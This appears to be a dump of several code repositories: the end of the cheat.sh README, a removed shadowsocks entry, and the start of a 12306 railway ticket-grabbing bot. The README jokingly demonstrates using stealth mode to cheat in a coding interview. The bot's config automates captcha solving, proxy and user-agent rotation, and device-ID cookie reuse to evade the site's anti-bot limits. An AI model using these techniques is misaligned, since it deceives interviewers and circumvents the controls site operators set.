context and spare repeating the programming language name: ``` $ cht.sh --shell cht.sh> cd go cht.sh/go> reverse a list ``` or even start the client in this context: ``` $ cht.sh --shell go cht.sh/go> reverse a list ... cht.sh/go> join a list ... ``` If you want to change the context, you can do it with the `cd` command, or if you want do a single query for some other language, just prepend it with `/`: ``` $ cht.sh --shell go ... cht.sh/go> /python dictionary comprehension ... ``` If you want to copy the last answer into the clipboard, you can use the `c` (`copy`) command, or `C` (`ccopy`, without comments). ``` cht.sh/python> append file # python - How do you append to a file? with open("test.txt", "a") as myfile: myfile.write("appended text") cht.sh/python> C copy: 2 lines copied to the selection ``` Type `help` for other internal `cht.sh` commands. ``` cht.sh> help help - show this help hush - do not show the 'help' string at start anymore cd LANG - change the language context copy - copy the last answer in the clipboard (aliases: yank, y, c) ccopy - copy the last answer w/o comments (cut comments; aliases: cc, Y, C) exit - exit the cheat shell (aliases: quit, ^D) id [ID] - set/show an unique session id ("reset" to reset, "remove" to remove) stealth - stealth mode (automatic queries for selected text) update - self update (only if the scriptfile is writeable) version - show current cht.sh version /:help - service help QUERY - space separated query staring (examples are below) cht.sh> python zip list cht.sh/python> zip list cht.sh/go> /python zip list ``` The `cht.sh` client has its configuration file which is located at `~/.cht.sh/cht.sh.conf` (location of the file can be overridden by the environment variable `CHTSH_CONF`). Use it to specify query options that you would use with each query. For example, to switch syntax highlighting off create the file with the following content: ```bash CHTSH_QUERY_OPTIONS="T" ``` Or if you want to use a special syntax highlighting theme: ```bash CHTSH_QUERY_OPTIONS="style=native" ``` (`curl cht.sh/:styles-demo` to see all supported styles). 
Other cht.sh configuration parameters: ```bash CHTSH_CURL_OPTIONS="-A curl" # curl options used for cht.sh queries CHTSH_URL=https://cht.sh # URL of the cheat.sh server ``` ### Tab completion #### Bash Tab completion To activate tab completion support for `cht.sh`, add the `:bash_completion` script to your `~/.bashrc`: ```bash curl https://cheat.sh/:bash_completion > ~/.bash.d/cht.sh . ~/.bash.d/cht.sh # and add . ~/.bash.d/cht.sh to ~/.bashrc ``` #### ZSH Tab completion To activate tab completion support for `cht.sh`, add the `:zsh` script to the *fpath* in your `~/.zshrc`: ```zsh curl https://cheat.sh/:zsh > ~/.zsh.d/_cht echo 'fpath=(~/.zsh.d/ $fpath)' >> ~/.zshrc # Open a new shell to load the plugin ``` ---- ### Stealth mode Being used fully unnoticed is one of the most important property of any cheat sheet. cheat.sh can be used completely unnoticed too. The cheat.sh client, `cht.sh`, has a special mode, called **stealth mode**. Using that, you don't even need to touch your keyboard to open a cheat sheet. In this mode, as soon as you select some text with the mouse (and thus adding it into the selection buffer of X Window System or into the clipboard) it's used as a query string for cheat.sh, and the correspondent cheat sheet is automatically shown. Let's imagine, that you are having an online interview, where your interviewer asks you some questions using a shared document (say Google Docs) and you are supposed to write your coding answers there (it's possible too that you'll type in the questions on your own, just to show to the interviewer that you've heard it right). When using the stealth mode of `cht.sh`, the only thing you need to do in order to see a cheat sheet for some question, is to select the question using the mouse. If you don't want any text in the answers and the only thing you need is code, use the `Q` option when starting the stealth mode. <p align="center"> <img src='https://cheat.sh/files/stealth-mode.gif'/> </p> ``` You: Hi! | $ cht.sh --shell python She: Hi! | cht.sh/python> stealth Q She: Are you ready for a small interview? | stealth: you are in the stealth mode; select any text She: Just a couple of questions | stealth: selections longer than 5 words are ignored She: We will talk about python | stealth: query arguments: ?Q She: Let's start from something simple. | stealth: use ^C to leave this mode She: Do you know how to reverse a list in python? | You: Sure | You: (selecting "reverse a list") | stealth: reverse a list | reverse_lst = lst[::-1] You: lst[::-1]? | She: Good. | She: Do you know how to chain a list of lists? | You: (selecting "chain a list of lists") | stealth: chain a list of lists | import itertools | a = [["a","b"], ["c"]] | print list(itertools.chain.from_iterable(a)) You: May I use external modules? | She: What module do you want to use? | You: itertools | She: Yes, you may use it | You: Ok, then: | You: itertools.chain.from_iterable(a) | She: Good. Let's try something harder. | She: What about quicksort implementation? | You: (selecting "quicksort implementation") | stealth: quicksort implementation You: Let me think about it. | (some big and clumsy lowlevel implementation shown) You: Well...(starting typing it in) | def sort(array=[12,4,5,6,7,3,1,15]): | less = [] She: (seeing your ugly pascal style) | equal = [] She: Could you write it more concise? | greater = [] | if len(array) > 1: You: What do you mean? | pivot = array[0] | for x in array: She: I mean, | if x < pivot: less.append(x) She: do you really need all these ifs and fors? 
| if x == pivot: equal.append(x) She: Could you maybe just use filter instead? | if x > pivot: greater.append(x) | return sort(less)+equal+sort(greater) You: quicksort with filter? | else: | return array She: Yes | You: (selecting "quicksort with filter") | stealth: quicksort with filter You: Ok, I will try. | return qsort(filter(lt, L[1:]))+[pivot] \ You: Something like this? | +qsort(filter(ge, L[1:])) You: qsort(filter(lt, L[1:]))+[pivot] \ | + qsort(filter(ge, L[1:])) | | She: Yes! Perfect! Exactly what I wanted to see! | | ``` Of course, this is just for fun, and you should never cheat in your coding interviews, because you know what happens when you do. ![when you lie in your interview](http://cheat.sh/files/when-you-lie-katze.png) ### Windows command line client You can access cheat.sh from Windows command line too. Use cheat.sh command line client for that: [`cht.exe`](https://github.com/tpanj/cht.exe). It supports: * output colorization; * command line options; * its own configuration file. You can also use [`scoop`](https://github.com/lukesampson/scoop) command-line installer for Windows to get it: ```batch scoop install cht ``` ---- ## Self-Hosting ### Docker Currently, the easiest way to get a self-hosted instance running is by using the `docker-compose.yml` file. docker-compose up This builds and runs the image with baked in cheatsheets and starts the app and a Redis instance to back it, making the service available at http://localhost:8002 This is currently an early implementation and should probably not be used for anything outside of internal/dev/personal use right now. ## Editors integration You can use *cheat.sh* directly from the editor (*Emacs*, *Sublime*, *Vim*, and *Visual Studio Code* are currently supported; not all features are supported by all plugins though; see below). Instead of opening your browser, googling, browsing Stack Overflow and eventually copying the code snippets you need into the clipboard and later pasting them into the editor, you can achieve the same instantly and without leaving the editor at all! Here is what it looks like in Vim: 1. If you have a question while editing a program, you can just type your question directly in the buffer and press `<leader>KK`. You will get the answer to your question in pager. (with `<leader>KB` you'll get the answer in a separate buffer). 2. If you like the answer, you can manually paste it from the buffer or the pager, or if you are lazy you can use `<leader>KP` to paste it below/under your question (or replace you question using `<leader>KR`). If you want the answer without the comments, `<leader>KC` replays the last query toggling them. If you use some static analysis plugin such as *syntastic* (for Vim), you can use its warning and error messages as cheat.sh queries: place the cursor on the problem line and press `<leader>KE`: explanation for the warning will be opened in a new buffer. 
Features supported by cheat.sh plugins for different editors: |Feature |Emacs|Sublime|Vim|VSCode|IDEA|QtCreator| |-------------------|-----|-------|---|------|----|---------| |Command queries |✓ |✓ |✓ |✓ |✓ |✓ | |Queries from buffer| | |✓ |✓ | |✓ | |Toggle comments | | |✓ |✓ |✓ |✓ | |Prev/next answer | | |✓ |✓ |✓ |✓ | |Multiple answers | |✓ | | |✓ | | |Warnings as queries| | |✓ | | | | |Queries history | | |✓ |✓ | | | |Session id | | |✓ | | | | |Configurable server|✓ | |✓ |✓ | |✓ | ### Vim * [cheat.sh-vim](https://github.com/dbeniamine/cheat.sh-vim) — Vim support Here is Vim configuration example: ```vim " some configuration above ... let mapleader=" " call vundle#begin() Bundle 'gmarik/vundle' Bundle 'scrooloose/syntastic' Bundle 'dbeniamine/cheat.sh-vim' call vundle#end() let g:syntastic_javascript_checkers = [ 'jshint' ] let g:syntastic_ocaml_checkers = ['merlin'] let g:syntastic_python_checkers = ['pylint'] let g:syntastic_shell_checkers = ['shellcheck'] " some configuration below ... ``` In this example, several Vim plugins are used: * [gmarik/vundle](https://github.com/VundleVim/Vundle.vim) — Vim plugin manager * [scrooloose/syntastic](https://github.com/vim-syntastic/syntastic) — Syntax checking plugin * [cheat.sh-vim](https://github.com/dbeniamine/cheat.sh-vim) — Vim support Syntastic shows warnings and errors (found by code analysis tools: `jshint`, `merlin`, `pylint`, `shellcheck` etc.), and `cheat.sh-vim` shows you explanations for the errors and warnings and answers on programming languages queries written in the editor. Watch a demo, where the most important features of the cheat.sh Vim plugin are shown (5 Min): <p align="center"> <img src='https://cheat.sh/files/vim-demo.gif'/> </p> Or, if you want to scroll and/or pause, the same on YouTube: <p align="center"> <a href="http://www.youtube.com/watch?feature=player_embedded&v=xyf6MJ0y-z8 " target="_blank"><img src="http://img.youtube.com/vi/xyf6MJ0y-z8/0.jpg" alt="cheat.sh-vim: Using cheat.sh from vim" width="700" height="490" border="10" /></a> </p> <!-- [![asciicast](https://asciinema.org/a/c6QRIhus7np2OOQzmQ2RNXzRZ.png)](https://asciinema.org/a/c6QRIhus7np2OOQzmQ2RNXzRZ) --> ### Emacs * [cheat-sh.el](https://github.com/davep/cheat-sh.el) — Emacs support (available also at cheat.sh/:emacs) * cheat.sh/:emacs-ivy — Emacs support for ivy users [![asciicast](https://asciinema.org/a/3xvqwrsu9g4taj5w526sb2t35.png)](https://asciinema.org/a/3xvqwrsu9g4taj5w526sb2t35) ### Visual Studio Code * [vscode-snippet](https://github.com/mre/vscode-snippet) * Install it from [VSCode Marketplace](https://marketplace.visualstudio.com/items?itemName=vscode-snippet.Snippet) Usage: 1. Hit <kbd>⌘ Command</kbd> + <kbd>⇧ Shift</kbd> + <kbd>p</kbd> 2. Run `Snippet: Find`. 3. Type your query and hit enter. [![vscode-snippet](https://cheat.sh/files/vscode-snippet-demo.gif)](https://github.com/mre/vscode-snippet) *(GIF courtesy: Matthias Endler, @mre)* ### Sublime * [cheat.sh-sublime-plugin](https://github.com/gauravk-in/cheat.sh-sublime-plugin/) Usage: 1. Write your query string. 2. Select the query string. 3. Press <kbd>Cmd</kbd> + <kbd>⇧ Shift</kbd> + <kbd>B</kbd> to replace the selected query string by the answer generated from `cht.sh`. 
[![cheat.sh-sublime-plugin-demo](https://cheat.sh/files/demo-sublime.gif)](https://github.com/gauravk-in/cheat.sh-sublime-plugin) *(GIF courtesy: Gaurav Kukreja, @gauravk-in)* ### IntelliJ IDEA * [idea-cheatsh-plugin](https://github.com/szymonprz/idea-cheatsh-plugin) * Install from [idea plugins marketplace](https://plugins.jetbrains.com/plugin/11942-cheat-sh-code-snippets) Usage: 1. Write query string 2. Select the query string 3. Press keyboard shortcut <kbd>Alt</kbd> + <kbd>C</kbd> , <kbd>S</kbd> to replace the selected query string by the answer [![idea-cheatsh-plugin](https://cheat.sh/files/idea-demo.gif)](https://github.com/szymonprz/idea-cheatsh-plugin) *(GIF courtesy: Szymon Przebierowski, @szymonprz)* ### QtCreator * [cheatsh-qtcreator](https://github.com/pozemka/cheatsh-qtcreator) Current features: * search word under cursor * search selected * query search * disable comments * paste answer (?TQ version) * custom server URL * custom search context (default is cpp) * hotkeys and menu [![cheatsh-qtcreator](https://user-images.githubusercontent.com/1259724/73876361-ecce5d00-4867-11ea-9f75-c5b127a9739c.gif)](https://github.com/pozemka/cheatsh-qtcreator) *(GIF courtesy: Pozemka, @pozemka)* ## Special pages There are several special pages that are not cheat sheets. Their names start with colon and have special meaning. Getting started: ``` :help description of all special pages and options :intro cheat.sh introduction, covering the most important usage questions :list list all cheat sheets (can be used in a subsection too: /go/:list) ``` Command line client `cht.sh` and shells support: ``` :cht.sh code of the cht.sh client :bash_completion bash function for tab completion :bash bash function and tab completion setup :fish fish function and tab completion setup :zsh zsh function and tab completion setup ``` Editors support: ``` :vim cheat.sh support for Vim :emacs cheat.sh function for Emacs :emacs-ivy cheat.sh function for Emacs (uses ivy) ``` Other pages: ``` :post how to post new cheat sheet :styles list of color styles :styles-demo show color styles usage examples :random fetches a random page (can be used in a subsection too: /go/:random) ``` ## Search To search for a keyword, use the query: ``` /~keyword ``` In this case search is not recursive — it is conducted only in a page of the specified level. For example: ``` /~snapshot look for snapshot in the first level cheat sheets /scala/~currying look for currying in scala cheat sheets ``` For a recursive search in all cheat sheets, use double slash: ``` /~snapshot/r look for snapshot in all cheat sheets ``` You can use special search options after the closing slash: ``` /~shot/bi case insensitive (i), word boundaries (b) ``` List of search options: ``` i case insensitive search b word boundaries r recursive search ``` ## Programming languages cheat sheets Cheat sheets related to programming languages are organized in namespaces (subdirectories), that are named according to the programming language. For each supported programming language there are several special cheat sheets: its own sheet, `hello`, `:list` and `:learn`. 
Say for lua it will look like: ``` lua lua/hello lua/:list lua/:learn ``` Some languages has the one-liners-cheat sheet, `1line`: ``` perl/1line ``` * `hello` describes how you can start with the language — install it if needed, build and run its programs, and it shows the "Hello world" program written in the language; * `:list` shows all topics related to the language * `:learn` shows a learn-x-in-minutes language cheat sheet perfect for getting started with the language. * `1line` is a collection of one-liners in this language * `weirdness` is a collection of examples of weird things in this language ![cheat.sh usage](http://cheat.sh/files/supported-languages-c++.png) At the moment, cheat.sh covers the 58 following programming languages (alphabetically sorted): |Prefix |Language |Basics|One-liners|Weirdness|StackOverflow| |-----------|----------|------|----------|---------|-------------| |`arduino/` |Arduino | | | |✓ | |`assembly/`|Assembly | | | |✓ | |`awk/` |AWK |✓ | | |✓ | |`bash/` |Bash |✓ | | |✓ | |`basic/` |BASIC | | | |✓ | |`bf/` |Brainfuck |✓ | | |✓ | |`c/` |C |✓ | | |✓ | |`chapel/` |Chapel |✓ | | |✓ | |`clean/` |Clean | | | |✓ | |`clojure/` |Clojure |✓ | | |✓ | |`coffee/` |CoffeeScript|✓ | | |✓ | |`cpp/` |C++ |✓ | | |✓ | |`csharp/` |C# |✓ | | |✓ | |`d/` |D |✓ | | |✓ | |`dart/` |Dart |✓ | | |✓ | |`delphi/` |Dephi | | | |✓ | |`dylan/` |Dylan |✓ | | |✓ | |`eiffel/` |Eiffel | | | |✓ | |`elixir/` |Elixir |✓ | | |✓ | |`elisp/` |ELisp |✓ | | |✓ | |`elm/` |Elm |✓ | | |✓ | |`erlang/` |Erlang |✓ | | |✓ | |`factor/` |Factor |✓ | | |✓ | |`fortran/` |Fortran |✓ | | |✓ | |`forth/` |Forth |✓ | | |✓ | |`fsharp/` |F# |✓ | | |✓ | |`go/` |Go |✓ | | |✓ | |`groovy/` |Groovy |✓ | | |✓ | |`haskell/` |Haskell |✓ | | |✓ | |`java/` |Java |✓ | | |✓ | |`js/` |JavaScript|✓ |✓ |✓ |✓ | |`julia/` |Julia |✓ | | |✓ | |`kotlin/` |Kotlin |✓ | | |✓ | |`latex/` |LaTeX |✓ | | |✓ | |`lisp/` |Lisp |✓ | | |✓ | |`lua/` |Lua |✓ | | |✓ | |`matlab/` |MATLAB |✓ | | |✓ | |`nim/` |Nim |✓ | | |✓ | |`ocaml/` |OCaml |✓ | | |✓ | |`octave/` |Octave |✓ | | |✓ | |`perl/` |Perl |✓ |✓ | |✓ | |`perl6/` |Perl 6 |✓ |✓ | |✓ | |`php/` |PHP |✓ | | |✓ | |`pike/` |Pike | | | |✓ | |`python/` |Python |✓ |✓ | |✓ | |`python3/` |Python 3 |✓ | | |✓ | |`r/` |R |✓ | | |✓ | |`racket/` |Racket |✓ | | |✓ | |`ruby/` |Ruby |✓ | | |✓ | |`rust/` |Rust |✓ | | |✓ | |`scala/` |Scala |✓ | | |✓ | |`scheme/` |Scheme |✓ | | |✓ | |`solidity/`|Solidity |✓ | | |✓ | |`swift/` |Swift |✓ | | |✓ | |`tcsh/` |Tcsh |✓ | | |✓ | |`tcl/` |Tcl |✓ | | |✓ | |`objective-c/`|Objective-C|✓ | | |✓ | |`vb/` |VisualBasic|✓ | | |✓ | |`vbnet/` |VB.Net |✓ | | |✓ | And several other topics, that are though related to programming, are not programming languages: |Prefix |Topic |Basics|StackOverflow| |-----------|----------|------|-------------| |`cmake/` |CMake |✓ |✓ | |`django/` |Django | |✓ | |`flask/` |Flask | |✓ | |`git/` |Git |✓ |✓ | ## Cheat sheets sources Instead of creating yet another mediocre cheat sheet repository, we are concentrating our efforts on creation of a unified mechanism to access selected existing well developed and good maintained cheat sheet repositories covering topics of our interest: programming and operating systems usage. 
*cheat.sh* uses selected community driven cheat sheet repositories and information sources, maintained by thousands of users, developers and authors all over the world (in the *Users* column number of contributors/number of stars is shown): |Cheat sheets |Repository |C/U* |Stars |Creation Date| |-----------------------|------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------|-------------| |UNIX/Linux, programming|[cheat.sheets](https://github.com/chubin/cheat.sheets) |![](https://img.shields.io/github/contributors-anon/chubin/cheat.sheets?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/chubin/cheat.sheets?label=%E2%AD%90&labelColor=white) |May 1, 2017 | |UNIX/Linux commands |[tldr-pages/tldr](https://github.com/tldr-pages/tldr) |![](https://img.shields.io/github/contributors-anon/tldr-pages/tldr?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/tldr-pages/tldr?label=%E2%AD%90&labelColor=white) |Dec 8, 2013 | |UNIX/Linux commands |[chrisallenlane/cheat](https://github.com/chrisallenlane/cheat) |![](https://img.shields.io/github/contributors-anon/chrisallenlane/cheat?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/chrisallenlane/cheat?label=%E2%AD%90&labelColor=white) |Jul 28, 2013 | |Programming languages |[adambard/learnxinyminutes-docs](https://github.com/adambard/learnxinyminutes-docs) |![](https://img.shields.io/github/contributors-anon/adambard/learnxinyminutes-docs?label=%F0%9F%91%A5&labelColor=white)|![](https://img.shields.io/github/stars/adambard/learnxinyminutes-docs?label=%E2%AD%90&labelColor=white)|Jun 23, 2013 | |Go |[a8m/go-lang-cheat-sheet](https://github.com/a8m/go-lang-cheat-sheet) |![](https://img.shields.io/github/contributors-anon/a8m/go-lang-cheat-sheet?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/a8m/go-lang-cheat-sheet?label=%E2%AD%90&labelColor=white) |Feb 9, 2014 | |Perl |[pkrumnis/perl1line.txt](https://github.com/pkrumins/perl1line.txt) |![](https://img.shields.io/github/contributors-anon/pkrumins/perl1line.txt?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/pkrumins/perl1line.txt?label=%E2%AD%90&labelColor=white) |Nov 4, 2011 | |Programming languages |[StackOverflow](https://stackoverflow.com) |[14M](https://stackexchange.com/leagues/1/alltime/stackoverflow) |N/A |Sep 15, 2008 | <sup>(*) C/U — contributors for GitHub repositories, Users for Stackoverflow</sup> Pie diagram reflecting cheat sheets sources distribution (by number of cheat sheets on cheat.sh originating from a repository): ![cheat.sh cheat sheets repositories](http://cheat.sh/files/stat-2017-06-05.png) ## How to contribute ### How to edit a cheat sheet If you want to edit a cheat.sh cheat sheet, you should edit it in the upstream repository. You will find the name of the source repository in a browser when you open a cheat sheet. There are two github buttons at the bottom of the page: the second one is the button of the repository, which belongs the current cheat sheet. You can edit the cheat sheet directly in your browser (you need a github account for it). There is an edit button in the top right corner. If you click on it, an editor will be open. 
There you can change the cheat sheet (under the hood: the upstream repository is forked, your changes are committed to the forked repository, and a pull request is sent to the upstream repository owner).

![cheat.sh cheat sheets repositories](http://cheat.sh/files/edit-cheat-sheet.png)

### How to add a cheat sheet

If you want to add a cheat sheet, you have one of the following ways:

* Add it to one of the external cheat sheet repositories; you should decide on your own which repository is the best fit for your cheat sheet;
* Add it to the local cheat.sh repository ([cheat.sheets](https://github.com/chubin/cheat.sheets)) on GitHub (fork, commit, pull request);
* Post it on cheat.sh using curl or a web browser ([cheat.sh/:post](http://cheat.sh/:post)).

If you want to change an existing cheat sheet, you have to find the original repository the cheat sheet comes from (when you open a cheat sheet in a browser, you see that repository's GitHub button at the bottom of the cheat sheet) and change it there. After some time the changes will be synchronized to cheat.sh.

### How to add a cheat sheet repository

If you want to add a cheat sheet repository to cheat.sh, please open an issue:

* [Add a new repository](https://github.com/chubin/cheat.sh/issues/new)

Please specify the name of the repository and give a short description of it.

## Installation and standalone usage

You don't need to install anything to start using *cheat.sh*. There are two cases when you want to install *cheat.sh* locally:

1. You plan to use it offline, without Internet access;
2. You want to use your own cheat sheets (additionally, or as a replacement).

The installation process is described in detail here: [cheat.sh standalone installation](doc/standalone.md)
shadowsocks
938bba32a4008bdde9c064dda6a0597987ddef54
Removed according to regulations.
12306
a495af88346a0d794493c6030f6a6207debb5824
File: run.py # -*- coding=utf-8 -*- import argparse import sys def parser_arguments(argv): """ 不应该在这里定义,先放在这里 :param argv: :return: """ parser = argparse.ArgumentParser() parser.add_argument("operate", type=str, help="r: 运行抢票程序, c: 过滤cdn, t: 测试邮箱和server酱,server酱需要打开开关") return parser.parse_args(argv) if __name__ == '__main__': args = parser_arguments(sys.argv[1:]) if args.operate == "r": from init import select_ticket_info select_ticket_info.select().main() elif args.operate == "t": from config.emailConf import sendEmail from config.serverchanConf import sendServerChan sendEmail(u"订票小助手测试一下") sendServerChan("订票小助手测试一下") elif args.operate == "c": from agency.cdn_utils import filterCdn filterCdn() File: TickerConfig.py # -*- coding=utf-8 -*- # 关于软件使用配置说明,一定要看!!! # ps: 如果是候补车票,需要通过人证一致性核验的用户及激活的“铁路畅行”会员可以提交候补需求,请您按照操作说明在铁路12306app.上完成人证核验 # 关于候补了之后是否还能继续捡漏的问题在此说明: 软件为全自动候补加捡漏,如果软件候补成功则会停止抢票,发出邮件通知,但是不会影响你继续捡漏, # 如果这个时候捡漏捡到的话,也是可以付款成功的,也就是说,捡漏+候补,可以最大程度提升抢票成功率 # 刷票模式:1=刷票 2=候补+刷票 TICKET_TYPE = 1 # 出发日期(list) "2018-01-06", "2018-01-07" STATION_DATES = [ "2020-01-18" ] # 填入需要购买的车次(list),"G1353" # 修改车次填入规则,注:(以前设置的车次逻辑不变),如果车次填入为空,那么就是当日乘车所有车次都纳入筛选返回 # 不填车次是整个list为空才算,如果不是为空,依然会判断车次的,这种是错误的写法 [""], 正确的写法 [] STATION_TRAINS = [] # 出发城市,比如深圳北,就填深圳就搜得到 FROM_STATION = "广州南" # 到达城市 比如深圳北,就填深圳就搜得到 TO_STATION = "隆回" # 座位(list) 多个座位ex: # "商务座", # "一等座", # "二等座", # "特等座", # "软卧", # "硬卧", # "硬座", # "无座", # "动卧", SET_TYPE = ["二等座"] # 当余票小于乘车人,如果选择优先提交,则删减联系人和余票数一致在提交 # bool IS_MORE_TICKET = True # 乘车人(list) 多个乘车人ex: # "张三", # "李四" TICKET_PEOPLES = [] # 12306登录账号 USER = "" PWD = "" # 加入小黑屋时间默认为5分钟,此功能为了防止僵尸票导致一直下单不成功错过正常的票 TICKET_BLACK_LIST_TIME = 5 # 自动打码 IS_AUTO_CODE = True # 设置2本地自动打码,需要配置tensorflow和keras库,3为云打码,由于云打码服务器资源有限(为2h4C的cpu服务器),请不要恶意请求,不然只能关闭服务器 # ps: 请不要一直依赖云服务器资源,在此向所有提供服务器同学表示感谢 AUTO_CODE_TYPE = 3 # 此处设置云打码服务器地址,如果有自建的服务器,可以自行更改 HOST = "120.77.154.140:8000" REQ_URL = "/verify/base64/" HTTP_TYPE = "http" # HOST="12306.yinaoxiong.cn" #备用服务器稳定性较差 # REQ_URL="/verify/base64/" # HTTP_TYPE="https" # 邮箱配置,如果抢票成功,将通过邮件配置通知给您 # 列举163 # email: "[email protected]" # notice_email_list: "[email protected]" # username: "xxxxx" # password: "xxxxx # host: "smtp.163.com" # 列举qq ,qq设置比较复杂,需要在邮箱-->账户-->开启smtp服务,取得授权码==邮箱登录密码 # email: "[email protected]" # notice_email_list: "[email protected]" # username: "xxxxx" # password: "授权码" # host: "smtp.qq.com" EMAIL_CONF = { "IS_MAIL": True, "email": "", "notice_email_list": "", "username": "", "password": "", "host": "smtp.qq.com", } # 是否开启 server酱 微信提醒, 使用前需要前往 http://sc.ftqq.com/3.version 扫码绑定获取 SECRET 并关注获得抢票结果通知的公众号 SERVER_CHAN_CONF = { "is_server_chan": False, "secret": "" } # 是否开启cdn查询,可以更快的检测票票 1为开启,2为关闭 IS_CDN = 1 # 下单接口分为两种,1 模拟网页自动捡漏下单(不稳定),2 模拟车次后面的购票按钮下单(稳如老狗) ORDER_TYPE = 2 # 下单模式 1 为预售,整点刷新,刷新间隔0.1-0.5S, 然后会校验时间,比如12点的预售,那脚本就会在12.00整检票,刷新订单 # 2 是捡漏,捡漏的刷新间隔时间为0.5-3秒,时间间隔长,不容易封ip ORDER_MODEL = 1 # 是否开启代理, 0代表关闭, 1表示开始 # 开启此功能的时候请确保代理ip是否可用,在测试放里面经过充分的测试,再开启此功能,不然可能会耽误你购票的宝贵时间 # 使用方法: # 1、在agency/proxy_list列表下填入代理ip # 2、测试UnitTest/TestAll/testProxy 测试代理是否可以用 # 3、开启代理ip IS_PROXY = 0 # 预售放票时间, 如果是捡漏模式,可以忽略此操作 OPEN_TIME = "12:59:57" # 1=使用selenium获取devicesID # 2=使用网页端/otn/HttpZF/logdevice获取devicesId,这个接口的算法目前可能有点问题,如果登录一直302的请改为配置1 # 3=自己打开浏览器在headers-Cookies中抓取RAIL_DEVICEID和RAIL_EXPIRATION,这个就不用配置selenium COOKIE_TYPE = 3 # 如果COOKIE_TYPE=1,则需配置chromeDriver路径,下载地址http://chromedriver.storage.googleapis.com/index.html # chromedriver配置版本只要和chrome的大版本匹配就行 CHROME_PATH = "/usr/src/app/chromedriver" # 为了docker37 准备的环境变量,windows环境可以不用管这个参数 CHROME_CHROME_PATH = 
"/opt/google/chrome/google-chrome" # 如果COOKIE_TYPE=3, 则需配置RAIL_EXPIRATION、RAIL_DEVICEID的值 RAIL_EXPIRATION = "" RAIL_DEVICEID = "" # RAIL_EXPIRATION = "1577034103293" # RAIL_DEVICEID = "CDno29Erc_Pf3FSXb4dzq-Op64EhWrsi5yUZKVIKR1MAfYo2qFlCeXD8VkexY7_1qg-ClV-fE8j9jgVlPZxRh3wVc2iqLe_5A8sdr62qZx4B22JPF8lFCjpgTKZ5ODW90HJd5tiQsJ1KR9nOqHRxHj1FT5LEIwfw" # 1=>为一直随机ua,2->只启动的时候随机一次ua RANDOM_AGENT = 2 PASSENGER_TICKER_STR = { '一等座': 'M', '特等座': 'P', '二等座': 'O', '商务座': 9, '硬座': 1, '无座': 1, '软座': 2, '软卧': 4, '硬卧': 3, } # 保护12306官网请求频率,设置随机请求时间,原则为5分钟不大于80次 # 最大间隔请求时间 MAX_TIME = 3 # 最小间隔请求时间 MIN_TIME = 1 # 软件版本 RE_VERSION = "1.2.004" File: __init__.py File: init/__init__.py File: init/select_ticket_info.py # -*- coding=utf-8 -*- import datetime import random import os import socket import sys import threading import time import TickerConfig import wrapcache from agency.cdn_utils import CDNProxy, open_cdn_file from config import urlConf, configCommon from config.TicketEnmu import ticket from config.configCommon import seat_conf_2, seat_conf from config.getCookie import getDrvicesID from init.login import GoLogin from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest from inter.ChechFace import chechFace from inter.CheckUser import checkUser from inter.GetPassengerDTOs import getPassengerDTOs from inter.LiftTicketInit import liftTicketInit from inter.Query import query from inter.SubmitOrderRequest import submitOrderRequest from myException.PassengerUserException import PassengerUserException from myException.UserPasswordException import UserPasswordException from myException.ticketConfigException import ticketConfigException from myException.ticketIsExitsException import ticketIsExitsException from myException.ticketNumOutException import ticketNumOutException from myUrllib.httpUtils import HTTPClient class select: """ 快速提交车票通道 """ def __init__(self): self.cdn_list = open_cdn_file("filter_cdn_list") self.get_ticket_info() self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE] self.auto_code_type = TickerConfig.AUTO_CODE_TYPE self.httpClint = HTTPClient(TickerConfig.IS_PROXY, self.cdn_list) self.httpClint.cdn = self.cdn_list[random.randint(0, 4)] self.urls = urlConf.urls self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type) self.cookies = "" self.queryUrl = "leftTicket/queryO" self.passengerTicketStrList = "" self.passengerTicketStrByAfterLate = "" self.oldPassengerStr = "" self.set_type = "" self.flag = True @staticmethod def get_ticket_info(): """ 获取配置信息 :return: """ print(u"*" * 50) print(f"检查当前版本为: {TickerConfig.RE_VERSION}") version = sys.version.split(" ")[0] print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(version)) if version < "3.6.0": raise Exception print(u"12306刷票小助手,最后更新于2019.09.18,请勿作为商业用途,交流群号:" u" 1群:286271084(已满)\n" u" 2群:649992274(已满)\n" u" 3群:632501142(已满)\n" u" 4群: 606340519(已满)\n" u" 5群: 948526733(已满)\n" u" 7群: 660689659(已满)\n" u" 8群: 620629239(已满)\n" u" 6群: 608792930(未满)\n" u" 9群: 693035807(未满)\n" ) print( f"当前配置:\n出发站:{TickerConfig.FROM_STATION}\n到达站:{TickerConfig.TO_STATION}\n车次: {','.join(TickerConfig.STATION_TRAINS) or '所有车次'}\n乘车日期:{','.join(TickerConfig.STATION_DATES)}\n坐席:{','.join(TickerConfig.SET_TYPE)}\n是否有票优先提交:{TickerConfig.IS_MORE_TICKET}\n乘车人:{TickerConfig.TICKET_PEOPLES}\n" \ f"刷新间隔: 随机(1-3S)\n僵尸票关小黑屋时长: {TickerConfig.TICKET_BLACK_LIST_TIME}\n下单接口: {TickerConfig.ORDER_TYPE}\n下单模式: {TickerConfig.ORDER_MODEL}\n预售踩点时间:{TickerConfig.OPEN_TIME}") print(u"*" * 50) def station_table(self, from_station, to_station): """ 读取车站信息 :param 
